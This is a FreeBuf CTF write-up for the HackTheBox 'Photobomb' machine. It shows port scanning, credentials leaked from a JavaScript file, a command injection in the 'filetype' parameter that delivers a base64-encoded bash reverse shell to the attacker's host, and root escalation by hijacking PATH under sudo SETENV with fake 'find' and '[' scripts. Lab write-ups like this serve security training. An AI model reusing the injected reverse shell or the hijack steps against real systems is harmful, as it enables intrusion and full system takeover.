主站

分类

漏洞工具极客 Web安全系统安全网络安全无线安全设备/客户端安全数据安全安全管理企业安全工控安全

特色

头条人物志活动视频观点招聘报告资讯区块链安全标准与合规容器安全公开课

点我创作

试试在FreeBuf发布您的第一篇文章让安全圈留下您的足迹

我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序把安全装进口袋

Web安全

[Meachines] [Easy] Photobomb Js凭据泄露RCE+SETENV路径劫持+built-in(内建命令)劫持

maptnh 2025-02-24 23:21:41 18414

所属地福建省

本文由 maptnh 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

Information Gathering

IP Address	Opening Ports
10.10.11.182	TCP:22,80

$ ip='10.10.11.182'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Photobomb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

.Js credential Leak && Command Injection

# echo '10.10.11.182 photobomb.htb' >>/etc/hosts

http://photobomb.htb/

view-source:http://photobomb.htb/photobomb.js

username:pH0t0
password:b0Mb!

$ echo -n '/bin/bash -i >& /dev/tcp/10.10.16.31/443 0>&1' | base64

$ curl 'http://pH0t0:b0Mb!@photobomb.htb/printer' -d 'photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;rm /tmp/f;echo+L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMxLzQ0MyAwPiYx|base64+-d|bash&dimensions=3000x2000'

User.txt

795c713ef76ed21f2748a1b96a83986c

Privilege Escalation:

SETENV Path Hijack (find)

$ echo -e '#!/bin/bash\n/bin/bash'>/tmp/find
$ chmod +x /tmp/find

sudo 默认不使用当前 PATH 变量（它使用 secure_path），当存在 SETENV 权限时，我们将可以在环境变量注入到脚本

$ sudo -u root PATH=/tmp:$PATH /opt/cleanup.sh

built-in commands hijack

$ diff /etc/bash.bashrc /opt/.bashrc

[是 bash 中的内建命令，通常用于条件测试，等价于 test 命令。这里/opt/cleanup.sh脚本执行调用/opt/.bashrc后禁用 [命令，脚本确保了 [这个命令不再作为内建命令使用

即可通过劫持if语句右侧的[或者]内建命令

$ echo -e '#!/bin/bash\n/bin/bash'>/tmp/[
$ chmod +x /tmp/[
$ sudo -u root PATH=/tmp:$PATH /opt/cleanup.sh

Root.txt

c25100ccbba46eaf57b57a61af95abc7

# web安全 # CTF

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

maptnh

Ценность жизни выше, чем кража данных.

已在FreeBuf发表 344 篇文章

本文为 maptnh 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

HackTheBox

展开更多

相关推荐

shiro反序列化漏洞学习原创

shiro反序列化漏洞学习

漏洞

由于利用工具以及很成熟了，就不进行复现了。本文只探讨漏洞原理。个人见解。

小L不会挖洞

50647围观 · 2收藏 2025-02-27

小白--弱口令原创

小白--弱口令

Web安全

前言小白博主和小白一起前行信息搜集首先，我们要收集含有登录框的网站。常见的空间搜索引擎有fofa、360quake、鹰图、shodan。常见...

53501围观 · 2收藏 2025-02-27

深度解析流量转发

深度解析流量转发

Web安全

一文带你搞定全局代理、流量转发

87407围观 · 6收藏 2025-02-27

fastjson 反序列化RCE漏洞复现原创

fastjson 反序列化RCE漏洞复现

Web安全

大致流程1，先在攻击机上编写好含有恶意代码的类，编译成class文件。其中有我们要执行的命令，开启web服务2，还需要在攻击机上利用jar包...

小L不会挖洞

51395围观 · 3收藏 · 9喜欢 2025-02-27

[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升原创

[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升

Web安全

#Moodle CMS RCE #Backup.sh #ln软连接滥用权限提升

15203围观 2025-02-27

maptnh LV.9

Ценность жизни выше, чем кража данных.

344 文章数
65 关注者

[CISSP] [9] 安全漏洞,威胁和对策

2025-04-09

[CISSP] [8] 安全模型,设计和能力的原则

2025-04-09

[CISSP] [7] PKI和密码应用

2025-04-03

文章目录